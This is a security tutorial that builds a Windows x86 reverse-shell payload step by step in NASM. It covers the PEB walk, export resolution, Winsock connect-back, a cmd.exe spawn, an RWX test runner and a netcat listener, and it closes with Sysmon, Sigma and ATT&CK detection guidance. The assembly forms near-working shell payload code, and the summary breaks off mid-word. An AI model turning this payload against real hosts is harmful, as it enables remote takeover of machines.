Writing Your First Shellcode: x86 Reverse Shell from Scratch
Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate
kernel32.dll, parsing the PE export table to resolveGetProcAddresswithout imports, initialising Winsock, and spawningcmd.exeover a socket — and learn the telemetry each stage emits so you can detect and defend against it.
1. What Is Shellcode? Constraints and Goals
Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.
A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.
| Constraint | Description |
|---|---|
| Position independent | Runs at an unknown address; all references are stack-relative or computed |
| Null-free | \x00 terminates strings in many injection vectors and truncates the payload |
| No imports | API addresses must be resolved from loaded modules at runtime |
| Bad-char aware | \x00, \x0a, \x0d and vector-specific bytes must be avoided by design |
Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.
2. x86 Calling Conventions and Stack Mechanics
Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.
| Convention | Stack Cleanup | Argument Order | Used By |
|---|---|---|---|
stdcall | Callee (ret N) | Right-to-left | Win32 APIs (CreateProcessA, WSASocketA) |
cdecl | Caller | Right-to-left | CRT functions |
eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.
3. The PEB Walk: Finding kernel32.dll Without Imports
Every thread can reach its Process Environment Block (PEB) through the TEB at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. On Windows 7–11 x86 the load order is fixed: [0] the executable → [1] ntdll.dll → [2] kernel32.dll. Two FLink dereferences land on kernel32‘s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.
bits 32
xor eax, eax
mov eax, [fs:0x30] ; TEB->ProcessEnvironmentBlock (PEB)
mov eax, [eax+0x0c] ; PEB->Ldr (PEB_LDR_DATA)
mov eax, [eax+0x14] ; Ldr->InMemoryOrderModuleList (1st: executable)
mov eax, [eax] ; FLink -> ntdll.dll entry
mov eax, [eax] ; FLink -> kernel32.dll entry
mov ebx, [eax+0x10] ; LDR entry->DllBase (kernel32 base) -> ebxVerify the chain live in WinDbg before trusting any offset on your target build:
0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4![Flowchart showing the PEB walk chain from TEB at FS:[0x30] through PEB, PEB_LDR_DATA, and InMemoryOrderModuleList to reach kernel32.dll base address](https://genxcyber.com/wp-content/uploads/2026/06/x86-reverse-shell-shellcode-from-scratch-bf1-scaled.png)
4. Export Table Parsing: Resolving GetProcAddress
The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).
; ebx = kernel32 base
mov eax, [ebx+0x3c] ; e_lfanew
mov eax, [ebx+eax+0x78] ; export table RVA
lea edi, [ebx+eax] ; edi -> IMAGE_EXPORT_DIRECTORY
mov ecx, [edi+0x20] ; AddressOfNames RVA
lea ecx, [ebx+ecx] ; -> name-pointer array
xor edx, edx ; name index = 0
.next:
mov esi, [ecx+edx*4] ; RVA of candidate name
lea esi, [ebx+esi] ; -> ASCII name string
; compare esi against "GetProcAddress" (string or 4-byte hash) ...
inc edx
jmp .next
.match:
mov eax, [edi+0x24] ; AddressOfNameOrdinals RVA
movzx eax, word [ebx+eax+edx*2] ; ordinal index for this name
mov ecx, [edi+0x1c] ; AddressOfFunctions RVA
mov eax, [ebx+ecx+eax*4]; function RVA
lea eax, [ebx+eax] ; eax = VA of GetProcAddressProduction shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.

5. Bootstrapping Further API Resolution
Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.
; ebp = resolved GetProcAddress, ebx = kernel32 base
push 0x41797261 ; "aryA"
push 0x7262694c ; "Libr"
push 0x64616f4c ; "Load"
mov esi, esp ; esi -> "LoadLibraryA"
push esi
push ebx ; hModule = kernel32
call ebp ; GetProcAddress -> LoadLibraryA in eax
; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.Every API name is pushed as reversed dwords so it reads correctly in memory. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it seven times.
6. Winsock Initialisation and Socket Creation
WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).
sub esp, 0x190 ; reserve WSADATA (400 bytes)
push esp ; lpWSAData
push 0x0202 ; wVersionRequired = 2.2
call <WSAStartup>
xor eax, eax
push eax ; dwFlags
push eax ; g
push eax ; lpProtocolInfo = NULL
push 6 ; IPPROTO_TCP
push 1 ; SOCK_STREAM
push 2 ; AF_INET
call <WSASocketA> ; eax = socket handle
mov edi, eax ; save socket in ediBuild the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored network byte order (big-endian); 127.0.0.1:4444 becomes 0x0100007f and the packed family/port dword 0x5c110002.
xor eax, eax
push eax ; sin_zero[4..8]
push eax ; sin_zero[0..4]
push 0x0100007f ; sin_addr = 127.0.0.1
push 0x5c110002 ; sin_port 4444 | sin_family AF_INET
mov esi, esp ; esi -> SOCKADDR_IN
push eax ; lpCallee/QoS chain (NULLs)
push eax
push eax
push eax
push 0x10 ; namelen
push esi ; name -> SOCKADDR_IN
push edi ; socket
call <WSAConnect>7. Spawning cmd.exe Over the Socket
The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.
xor eax, eax
push edi ; hStdError = socket
push edi ; hStdOutput = socket
push edi ; hStdInput = socket
times 9 push eax ; zero lpReserved2..dwY (9 dwords)
push 0x00000100 ; dwFlags = STARTF_USESTDHANDLES
times 4 push eax ; lpTitle, lpDesktop, lpReserved, wShowWindow pad
push 0x44 ; cb = sizeof(STARTUPINFOA)
mov ebx, esp ; ebx -> STARTUPINFOA
sub esp, 0x10
mov esi, esp ; esi -> PROCESS_INFORMATION
push eax ; "....\0" terminator (runtime-supplied null)
push 0x6578652e ; ".exe"
push 0x646d6320 ; " cmd" (0x20 = space, null-free)
mov edx, esp ; edx -> " cmd.exe"
push esi ; lpProcessInformation
push ebx ; lpStartupInfo
push eax ; lpCurrentDirectory
push eax ; lpEnvironment
push eax ; dwCreationFlags
inc eax
push eax ; bInheritHandles = TRUE
dec eax
push eax ; lpThreadAttributes
push eax ; lpProcessAttributes
push edx ; lpCommandLine = " cmd.exe"
push eax ; lpApplicationName = NULL
call <CreateProcessA>
push eax ; uExitCode
call <ExitProcess>
8. Null-Byte Elimination and Bad-Character Audit
A single \x00 mid-payload can truncate your shellcode. Design it out from the start.
| Bad Byte | Naive Source | Null-Free Replacement |
|---|---|---|
\x00 | mov ecx, 0 | xor ecx, ecx |
\x00 in string | push 0x00657865 (“exe\0”) | terminator from push eax after xor eax,eax |
\x00 in mov al,0 | mov al, 0 | xor eax, eax then use al |
\x0a / \x0d | constant containing CR/LF | re-encode IP/port or split the immediate |
The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free, and the leading space the space-padded " cmd" introduces is tolerated by CreateProcessA‘s command-line parser. Audit the assembled binary with a scanner:
import sys
BAD = {0x00, 0x0a, 0x0d} # extend per injection vector
with open(sys.argv[1], "rb") as f:
sc = f.read()
for i, b in enumerate(sc):
if b in BAD:
print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")9. Testing and Verification
Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.
nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };
int main(void) {
void *mem = VirtualAlloc(NULL, sizeof(sc),
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE); // RWX: loud, lab-only
memcpy(mem, sc, sizeof(sc));
((void(*)())mem)();
return 0;
}Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.
10. Common Attacker Techniques
| Technique | Description |
|---|---|
| PEB walk | Locate kernel32.dll base with no imports via FS:[0x30] |
| Export hashing | Resolve APIs by name hash to stay small and null-free |
| Stack string building | Push reversed dwords to stage " cmd.exe", ws2_32.dll, API names |
| STDIO redirection | Point hStdInput/Output/Error at the socket for an interactive shell |
| Process injection | Deliver the blob via VirtualAllocEx + WriteProcessMemory + CreateRemoteThread |
| RWX → RX staging | Allocate RW, copy, VirtualProtect to RX to evade RWX heuristics |
11. Defensive Strategies and Detection
Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.
| Sysmon Event ID | Name | What It Catches |
|---|---|---|
1 | Process Create | cmd.exe with an unexpected ParentImage / ParentCommandLine |
3 | Network Connection | Outbound TCP from cmd.exe or a non-browser binary (C2 connect-back) |
8 | CreateRemoteThread | Cross-process thread where SourceImage ≠ TargetImage |
10 | ProcessAccess | GrantedAccess to injected memory; CallTrace containing UNKNOWN |
11 | FileCreate | Shellcode or loader dropped to disk |
Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.
The canonical community Sigma rule for shellcode injection keys on ProcessAccess:
title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
category: process_access
product: windows
detection:
selection:
GrantedAccess:
- '0x147a'
- '0x1f3fff'
CallTrace|contains: 'UNKNOWN'
condition: selection
tags:
- attack.defense_evasion
- attack.privilege_escalation
- attack.t1055
level: highHardening: enable command-line auditing, deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10, enforce default-deny egress on workstations (reverse shells need outbound TCP), apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office child processes) and d3e037e1-3eb8-44c8-a917-57927947596d (block untrusted processes from removable media), and alert on VirtualAlloc(RWX). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

12. Tools for Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| NASM | Assemble x86 to flat binary | nasm.us |
| WinDbg | Step the PEB walk and export parse live | microsoft.com |
| x64dbg | Dynamic analysis of the loader and payload | x64dbg.com |
| Ghidra | Static disassembly of extracted shellcode | ghidra-sre.org |
| Radare2 | Lightweight disassembly and patching | radare.org |
| Sysmon | Generate EID 1/3/8/10 detection telemetry | microsoft.com |
| Volatility | Memory forensics — recover RWX regions and injected code | volatilityfoundation.org |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Command and Scripting Interpreter: Windows Command Shell | T1059.003 | Sysmon EID 1 / 4688 cmd.exe spawn chain |
| Process Injection | T1055 | Sysmon EID 10 GrantedAccess + CallTrace UNKNOWN |
| Process Injection: DLL Injection | T1055.001 | Sysmon EID 7/8 on reflective-DLL delivery |
| Obfuscated Files or Information | T1027 | Null-free/encoded IP/port constants in the blob |
| Non-Application Layer Protocol | T1095 | Sysmon EID 3 / 5156 raw TCP from non-browser process |
| Application Layer Protocol: Web Protocols | T1071.001 | Proxy/TLS inspection (contrast C2 transport) |
| System Information Discovery | T1082 | PEB walk as in-memory module discovery |
| Native API | T1106 | Direct WSASocketA / CreateProcessA calls without framework APIs |
Summary
- A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects
cmd.exeover it. - The PEB walk (
FS:[0x30]→Ldr→InMemoryOrderModuleList, third entry) locateskernel32.dllwith no imports. - Parsing the PE export table resolves
GetProcAddress, which bootstrapsLoadLibraryAand every Winsock function. - Null-byte and bad-character avoidance is a design constraint, not a post-step —
xorfor zero, reversed stack strings, runtime-supplied terminators. - Det
Related Tutorials
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- x86 and x64 Assembly from Scratch
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V